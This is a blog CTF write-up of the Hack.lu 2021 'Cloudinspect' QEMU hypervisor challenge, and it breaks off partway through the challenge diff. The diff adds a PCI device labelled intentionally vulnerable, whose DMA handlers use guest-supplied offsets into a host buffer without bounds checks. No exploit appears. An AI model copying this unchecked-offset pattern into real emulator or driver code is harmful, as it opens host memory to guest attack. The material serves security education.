<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="true" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  <title>[Hack.lu 2021 - pwn] Cloudinspect | repr</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="CloudInspectCloundInpect was a hypervisor exploitation challenge I did for the Hack.lu event.I didn’t succeed to flag it within the 48 hours :(. But anyway I hope this write up will be interesting to">
<meta property="og:type" content="article">
<meta property="og:title" content="[Hack.lu 2021 - pwn] Cloudinspect">
<meta property="og:url" content="https://n4sm.github.io/posts/cloudinspect/index.html">
<meta property="og:site_name" content="repr">
<meta property="og:description" content="CloudInspectCloundInpect was a hypervisor exploitation challenge I did for the Hack.lu event.I didn’t succeed to flag it within the 48 hours :(. But anyway I hope this write up will be interesting to">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2021-11-06T23:00:00.000Z">
<meta property="article:modified_time" content="2023-09-05T09:45:11.051Z">
<meta property="article:author" content="nasm">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="nasm">
<meta property="article:tag" content="2021">
<meta property="article:tag" content="ret2school">
<meta property="article:tag" content="heap">
<meta property="article:tag" content="hack.lu">
<meta property="article:tag" content="arbitrary read">
<meta property="article:tag" content="arbitrary write">
<meta property="article:tag" content="hypervisor">
<meta property="article:tag" content="qemu">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="repr" type="application/atom+xml">
  
  
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: light)" href="/images/favicon-light-192.png" sizes="192x192">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-32.png" sizes="32x32">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-128.png" sizes="128x128">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-180.png" sizes="180x180">
    <link rel="icon" media="(prefers-color-scheme: dark)" href="/images/favicon-dark-192.png" sizes="192x192">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.0.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/pic/wall.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>repr </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="material-symbols-rounded light-mode-icon">wb_sunny</span>
      <span class="material-symbols-rounded dark-mode-icon">dark_mode</span>
    </a>
    
      <a id="nav-rss-link" class="nav-icon mobile-hide" href="/atom.xml" title="RSS Feed">
        <span class="material-symbols-rounded rss">rss_feed</span>
      </a>
    
    <a id="nav-search-btn" class="nav-icon" title="Search" style="display: none;">
      <span class="material-symbols-rounded">search</span>
    </a>
    <div id="nav-menu-btn" class="nav-icon">
      <span class="material-symbols-rounded">menu</span>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
    
      <a class="nav-dropdown-link" href="/atom.xml" title="RSS Feed">RSS</a>
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <image src=https://cdn.discordapp.com/attachments/755522926819934349/1135933820852502589/chtholly_nota_seniorious_by_asukaln_dfhx63b-414w-2x.jpg></image>
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">nasm </div>
      <div class="dot"></div>
      <div class="subtitle">pwn / kernel stuff </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://twitter.com/nasm_re" title="Twitter"><i class="fa-brands fa-twitter"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com/n4sm" title="GitHub"><i class="fa-brands fa-github"></i></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://ret2school.github.io/discord" title="Discord"><i class="fa-brands fa-discord"></i></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      


  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Categories</h3>
      <div class="category-box"></div>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">Recent Posts</h3>
      <ul>
        
          <a class="recent-link" href="/posts/hello-world/" title="Hello World" >
            <div class="recent-link-text">
              Hello World
            </div>
          </a>
        
          <a class="recent-link" href="/posts/iwindow/" title="[ImaginaryCTF 2023 - pwn] window-of-opportunity" >
            <div class="recent-link-text">
              [ImaginaryCTF 2023 - pwn] window-of-opportunity
            </div>
          </a>
        
      </ul>
    </div>
  </div>

    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-cloudinspect" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        [Hack.lu 2021 - pwn] Cloudinspect
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2021-11-06T23:00:00.000Z" itemprop="datePublished">2021-11-06</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
  <a class="meta-cate-link" href="/categories/pwn/">pwn</a>
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            3.1k words 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/2021/" rel="tag">2021</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/arbitrary-read/" rel="tag">arbitrary read</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/arbitrary-write/" rel="tag">arbitrary write</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf/" rel="tag">ctf</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/hack-lu/" rel="tag">hack.lu</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/heap/" rel="tag">heap</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/hypervisor/" rel="tag">hypervisor</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/nasm/" rel="tag">nasm</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/qemu/" rel="tag">qemu</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ret2school/" rel="tag">ret2school</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <h1 id="CloudInspect"><a href="#CloudInspect" class="headerlink" title="CloudInspect"></a>CloudInspect</h1><p>CloundInpect was a hypervisor exploitation challenge I did for the <a target="_blank" rel="noopener" href="https://flu.xxx/">Hack.lu event</a>.<br>I didn’t succeed to flag it within the 48 hours :(. But anyway I hope this write up will be interesting to read!<br>The related files can be found <a target="_blank" rel="noopener" href="https://github.com/ret2school/ctf/tree/master/2021/hack.lu/pwn/cloudinspect">right here</a></p>
<blockquote>
<p>After Whiterock released it’s trading bot cloud with special Stonks Sockets another hedge fund, Castel, comes with some competition. The special feature here is called “cloudinspect”.<br>The <code>flag</code> is located right next to the hypervisor. Go get it!</p>
</blockquote>
<h2 id="Vulnerable-PCI-device"><a href="#Vulnerable-PCI-device" class="headerlink" title="Vulnerable PCI device"></a>Vulnerable PCI device</h2><p>We got several files:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ ls</span><br><span class="line">build_qemu.sh  diff_chall.txt  flag  initramfs.cpio.gz  qemu-system-x86_64  run_chall.sh  vmlinuz-5.11.0-38-generic</span><br></pre></td></tr></table></figure>

<p>Apparently, according to the <code>diff_chall.txt</code> , the provided qemu binary is patched with some vulnerable code. Let’s take a look at the diff file:</p>
<figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">diff --git a/hw/misc/cloudinspect.c b/hw/misc/cloudinspect.c</span></span><br><span class="line">new file mode 100644</span><br><span class="line"><span class="comment">index 0000000000..f1c3f84b2a</span></span><br><span class="line"><span class="comment">--- /dev/null</span></span><br><span class="line"><span class="comment">+++ b/hw/misc/cloudinspect.c</span></span><br><span class="line"><span class="meta">@@ -0,0 +1,204 @@</span></span><br><span class="line"><span class="addition">+/*</span></span><br><span class="line"><span class="addition">+ * QEMU cloudinspect intentionally vulnerable PCI device</span></span><br><span class="line"><span class="addition">+ *</span></span><br><span class="line"><span class="addition">+ */</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+#include &quot;qemu/osdep.h&quot;</span></span><br><span class="line"><span class="addition">+#include &quot;qemu/units.h&quot;</span></span><br><span class="line"><span class="addition">+#include &quot;hw/pci/pci.h&quot;</span></span><br><span class="line"><span class="addition">+#include &quot;hw/hw.h&quot;</span></span><br><span class="line"><span class="addition">+#include &quot;hw/pci/msi.h&quot;</span></span><br><span class="line"><span class="addition">+#include &quot;qom/object.h&quot;</span></span><br><span class="line"><span class="addition">+#include &quot;qemu/module.h&quot;</span></span><br><span class="line"><span class="addition">+#include &quot;qapi/visitor.h&quot;</span></span><br><span class="line"><span class="addition">+#include &quot;sysemu/dma.h&quot;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+#define TYPE_PCI_CLOUDINSPECT_DEVICE &quot;cloudinspect&quot;</span></span><br><span class="line"><span class="addition">+typedef struct CloudInspectState CloudInspectState;</span></span><br><span class="line"><span class="addition">+DECLARE_INSTANCE_CHECKER(CloudInspectState, CLOUDINSPECT,</span></span><br><span class="line"><span class="addition">+                         TYPE_PCI_CLOUDINSPECT_DEVICE)</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+#define DMA_SIZE        4096</span></span><br><span class="line"><span class="addition">+#define CLOUDINSPECT_MMIO_OFFSET_CMD 0x78</span></span><br><span class="line"><span class="addition">+#define CLOUDINSPECT_MMIO_OFFSET_SRC 0x80</span></span><br><span class="line"><span class="addition">+#define CLOUDINSPECT_MMIO_OFFSET_DST 0x88</span></span><br><span class="line"><span class="addition">+#define CLOUDINSPECT_MMIO_OFFSET_CNT 0x90</span></span><br><span class="line"><span class="addition">+#define CLOUDINSPECT_MMIO_OFFSET_TRIGGER 0x98</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+#define CLOUDINSPECT_VENDORID 0x1337</span></span><br><span class="line"><span class="addition">+#define CLOUDINSPECT_DEVICEID 0x1337</span></span><br><span class="line"><span class="addition">+#define CLOUDINSPECT_REVISION 0xc1</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+#define CLOUDINSPECT_DMA_GET_VALUE      0x1</span></span><br><span class="line"><span class="addition">+#define CLOUDINSPECT_DMA_PUT_VALUE      0x2</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+struct CloudInspectState &#123;</span></span><br><span class="line"><span class="addition">+    PCIDevice pdev;</span></span><br><span class="line"><span class="addition">+    MemoryRegion mmio;</span></span><br><span class="line"><span class="addition">+    AddressSpace *as;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+    struct dma_state &#123;</span></span><br><span class="line"><span class="addition">+        dma_addr_t src;</span></span><br><span class="line"><span class="addition">+        dma_addr_t dst;</span></span><br><span class="line"><span class="addition">+        dma_addr_t cnt;</span></span><br><span class="line"><span class="addition">+        dma_addr_t cmd;</span></span><br><span class="line"><span class="addition">+    &#125; dma;</span></span><br><span class="line"><span class="addition">+    char dma_buf[DMA_SIZE];</span></span><br><span class="line"><span class="addition">+&#125;;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+static void cloudinspect_dma_rw(CloudInspectState *cloudinspect, bool write)</span></span><br><span class="line"><span class="addition">+&#123;</span></span><br><span class="line"><span class="addition">+    if (write) &#123;</span></span><br><span class="line"><span class="addition">+        uint64_t dst = cloudinspect-&gt;dma.dst;</span></span><br><span class="line"><span class="addition">+        // DMA_DIRECTION_TO_DEVICE: Read from an address space to PCI device</span></span><br><span class="line"><span class="addition">+        dma_memory_read(cloudinspect-&gt;as, cloudinspect-&gt;dma.src, cloudinspect-&gt;dma_buf + dst, cloudinspect-&gt;dma.cnt);</span></span><br><span class="line"><span class="addition">+    &#125; else &#123;</span></span><br><span class="line"><span class="addition">+        uint64_t src = cloudinspect-&gt;dma.src;</span></span><br><span class="line"><span class="addition">+        // DMA_DIRECTION_FROM_DEVICE: Write to address space from PCI device</span></span><br><span class="line"><span class="addition">+        dma_memory_write(cloudinspect-&gt;as, cloudinspect-&gt;dma.dst, cloudinspect-&gt;dma_buf + src, cloudinspect-&gt;dma.cnt);</span></span><br><span class="line"><span class="addition">+    &#125;</span></span><br><span class="line"><span class="addition">+&#125;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+static bool cloudinspect_DMA_op(CloudInspectState *cloudinspect, bool write) &#123;</span></span><br><span class="line"><span class="addition">+    switch (cloudinspect-&gt;dma.cmd) &#123;</span></span><br><span class="line"><span class="addition">+        case CLOUDINSPECT_DMA_GET_VALUE:</span></span><br><span class="line"><span class="addition">+        case CLOUDINSPECT_DMA_PUT_VALUE:</span></span><br><span class="line"><span class="addition">+            if (cloudinspect-&gt;dma.cnt &gt; DMA_SIZE) &#123;</span></span><br><span class="line"><span class="addition">+                return false;</span></span><br><span class="line"><span class="addition">+            &#125;</span></span><br><span class="line"><span class="addition">+            cloudinspect_dma_rw(cloudinspect, write);</span></span><br><span class="line"><span class="addition">+            break;</span></span><br><span class="line"><span class="addition">+        default:</span></span><br><span class="line"><span class="addition">+            return false;</span></span><br><span class="line"><span class="addition">+    &#125;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+    return true;</span></span><br><span class="line"><span class="addition">+&#125;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+static uint64_t cloudinspect_mmio_read(void *opaque, hwaddr addr, unsigned size)</span></span><br><span class="line"><span class="addition">+&#123;</span></span><br><span class="line"><span class="addition">+    CloudInspectState *cloudinspect = opaque;</span></span><br><span class="line"><span class="addition">+    uint64_t val = ~0ULL;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+    switch (addr) &#123;</span></span><br><span class="line"><span class="addition">+    case 0x00:</span></span><br><span class="line"><span class="addition">+        val = 0xc10dc10dc10dc10d;</span></span><br><span class="line"><span class="addition">+        break;</span></span><br><span class="line"><span class="addition">+    case CLOUDINSPECT_MMIO_OFFSET_CMD:</span></span><br><span class="line"><span class="addition">+        val = cloudinspect-&gt;dma.cmd;</span></span><br><span class="line"><span class="addition">+        break;</span></span><br><span class="line"><span class="addition">+    case CLOUDINSPECT_MMIO_OFFSET_SRC:</span></span><br><span class="line"><span class="addition">+        val = cloudinspect-&gt;dma.src;</span></span><br><span class="line"><span class="addition">+        break;</span></span><br><span class="line"><span class="addition">+    case CLOUDINSPECT_MMIO_OFFSET_DST:</span></span><br><span class="line"><span class="addition">+        val = cloudinspect-&gt;dma.dst;</span></span><br><span class="line"><span class="addition">+        break;</span></span><br><span class="line"><span class="addition">+    case CLOUDINSPECT_MMIO_OFFSET_CNT:</span></span><br><span class="line"><span class="addition">+        val = cloudinspect-&gt;dma.cnt;</span></span><br><span class="line"><span class="addition">+        break;</span></span><br><span class="line"><span class="addition">+    case CLOUDINSPECT_MMIO_OFFSET_TRIGGER:</span></span><br><span class="line"><span class="addition">+        val = cloudinspect_DMA_op(cloudinspect, false);</span></span><br><span class="line"><span class="addition">+        break;</span></span><br><span class="line"><span class="addition">+    &#125;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+    return val;</span></span><br><span class="line"><span class="addition">+&#125;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+static void cloudinspect_mmio_write(void *opaque, hwaddr addr, uint64_t val,</span></span><br><span class="line"><span class="addition">+                unsigned size)</span></span><br><span class="line"><span class="addition">+&#123;</span></span><br><span class="line"><span class="addition">+    CloudInspectState *cloudinspect = opaque;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+    switch (addr) &#123;</span></span><br><span class="line"><span class="addition">+    case CLOUDINSPECT_MMIO_OFFSET_CMD:</span></span><br><span class="line"><span class="addition">+        cloudinspect-&gt;dma.cmd = val;</span></span><br><span class="line"><span class="addition">+        break;</span></span><br><span class="line"><span class="addition">+    case CLOUDINSPECT_MMIO_OFFSET_SRC:</span></span><br><span class="line"><span class="addition">+        cloudinspect-&gt;dma.src = val;</span></span><br><span class="line"><span class="addition">+        break;</span></span><br><span class="line"><span class="addition">+    case CLOUDINSPECT_MMIO_OFFSET_DST:</span></span><br><span class="line"><span class="addition">+        cloudinspect-&gt;dma.dst = val;</span></span><br><span class="line"><span class="addition">+        break;</span></span><br><span class="line"><span class="addition">+    case CLOUDINSPECT_MMIO_OFFSET_CNT:</span></span><br><span class="line"><span class="addition">+        cloudinspect-&gt;dma.cnt = val;</span></span><br><span class="line"><span class="addition">+        break;</span></span><br><span class="line"><span class="addition">+    case CLOUDINSPECT_MMIO_OFFSET_TRIGGER:</span></span><br><span class="line"><span class="addition">+        val = cloudinspect_DMA_op(cloudinspect, true);</span></span><br><span class="line"><span class="addition">+        break;</span></span><br><span class="line"><span class="addition">+    &#125;</span></span><br><span class="line"><span class="addition">+&#125;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+static const MemoryRegionOps cloudinspect_mmio_ops = &#123;</span></span><br><span class="line"><span class="addition">+    .read = cloudinspect_mmio_read,</span></span><br><span class="line"><span class="addition">+    .write = cloudinspect_mmio_write,</span></span><br><span class="line"><span class="addition">+    .endianness = DEVICE_NATIVE_ENDIAN,</span></span><br><span class="line"><span class="addition">+    .valid = &#123;</span></span><br><span class="line"><span class="addition">+        .min_access_size = 4,</span></span><br><span class="line"><span class="addition">+        .max_access_size = 8,</span></span><br><span class="line"><span class="addition">+    &#125;,</span></span><br><span class="line"><span class="addition">+    .impl = &#123;</span></span><br><span class="line"><span class="addition">+        .min_access_size = 4,</span></span><br><span class="line"><span class="addition">+        .max_access_size = 8,</span></span><br><span class="line"><span class="addition">+    &#125;,</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+&#125;;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+static void pci_cloudinspect_realize(PCIDevice *pdev, Error **errp)</span></span><br><span class="line"><span class="addition">+&#123;</span></span><br><span class="line"><span class="addition">+    CloudInspectState *cloudinspect = CLOUDINSPECT(pdev);</span></span><br><span class="line"><span class="addition">+    // uint8_t *pci_conf = pdev-&gt;config;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+    if (msi_init(pdev, 0, 1, true, false, errp)) &#123;</span></span><br><span class="line"><span class="addition">+        return;</span></span><br><span class="line"><span class="addition">+    &#125;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+    cloudinspect-&gt;as = &amp;address_space_memory;</span></span><br><span class="line"><span class="addition">+    memory_region_init_io(&amp;cloudinspect-&gt;mmio, OBJECT(cloudinspect), &amp;cloudinspect_mmio_ops, cloudinspect,</span></span><br><span class="line"><span class="addition">+                    &quot;cloudinspect-mmio&quot;, 1 * MiB);</span></span><br><span class="line"><span class="addition">+    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &amp;cloudinspect-&gt;mmio);</span></span><br><span class="line"><span class="addition">+&#125;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+static void pci_cloudinspect_uninit(PCIDevice *pdev)</span></span><br><span class="line"><span class="addition">+&#123;</span></span><br><span class="line"><span class="addition">+    // CloudInspectState *cloudinspect = CLOUDINSPECT(pdev);</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+    msi_uninit(pdev);</span></span><br><span class="line"><span class="addition">+&#125;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+static void cloudinspect_instance_init(Object *obj)</span></span><br><span class="line"><span class="addition">+&#123;</span></span><br><span class="line"><span class="addition">+    // CloudInspectState *cloudinspect = CLOUDINSPECT(obj);</span></span><br><span class="line"><span class="addition">+&#125;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+static void cloudinspect_class_init(ObjectClass *class, void *data)</span></span><br><span class="line"><span class="addition">+&#123;</span></span><br><span class="line"><span class="addition">+    DeviceClass *dc = DEVICE_CLASS(class);</span></span><br><span class="line"><span class="addition">+    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+    k-&gt;realize = pci_cloudinspect_realize;</span></span><br><span class="line"><span class="addition">+    k-&gt;exit = pci_cloudinspect_uninit;</span></span><br><span class="line"><span class="addition">+    k-&gt;vendor_id = CLOUDINSPECT_VENDORID;</span></span><br><span class="line"><span class="addition">+    k-&gt;device_id = CLOUDINSPECT_DEVICEID;</span></span><br><span class="line"><span class="addition">+    k-&gt;revision = CLOUDINSPECT_REVISION;</span></span><br><span class="line"><span class="addition">+    k-&gt;class_id = PCI_CLASS_OTHERS;</span></span><br><span class="line"><span class="addition">+    set_bit(DEVICE_CATEGORY_MISC, dc-&gt;categories);</span></span><br><span class="line"><span class="addition">+&#125;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+static void pci_cloudinspect_register_types(void)</span></span><br><span class="line"><span class="addition">+&#123;</span></span><br><span class="line"><span class="addition">+    static InterfaceInfo interfaces[] = &#123;</span></span><br><span class="line"><span class="addition">+        &#123; INTERFACE_CONVENTIONAL_PCI_DEVICE &#125;,</span></span><br><span class="line"><span class="addition">+        &#123; &#125;,</span></span><br><span class="line"><span class="addition">+    &#125;;</span></span><br><span class="line"><span class="addition">+    static const TypeInfo cloudinspect_info = &#123;</span></span><br><span class="line"><span class="addition">+        .name          = TYPE_PCI_CLOUDINSPECT_DEVICE,</span></span><br><span class="line"><span class="addition">+        .parent        = TYPE_PCI_DEVICE,</span></span><br><span class="line"><span class="addition">+        .instance_size = sizeof(CloudInspectState),</span></span><br><span class="line"><span class="addition">+        .instance_init = cloudinspect_instance_init,</span></span><br><span class="line"><span class="addition">+        .class_init    = cloudinspect_class_init,</span></span><br><span class="line"><span class="addition">+        .interfaces = interfaces,</span></span><br><span class="line"><span class="addition">+    &#125;;</span></span><br><span class="line"><span class="addition">+</span></span><br><span class="line"><span class="addition">+    type_register_static(&amp;cloudinspect_info);</span></span><br><span class="line"><span class="addition">+&#125;</span></span><br><span class="line"><span class="addition">+type_init(pci_cloudinspect_register_types)</span></span><br><span class="line"><span class="comment">diff --git a/hw/misc/meson.build b/hw/misc/meson.build</span></span><br><span class="line"><span class="comment">index 1cd48e8a0f..5ff263ca2f 100644</span></span><br><span class="line"><span class="comment">--- a/hw/misc/meson.build</span></span><br><span class="line"><span class="comment">+++ b/hw/misc/meson.build</span></span><br><span class="line"><span class="meta">@@ -1,5 +1,6 @@</span></span><br><span class="line"> softmmu_ss.add(when: &#x27;CONFIG_APPLESMC&#x27;, if_true: files(&#x27;applesmc.c&#x27;))</span><br><span class="line"> softmmu_ss.add(when: 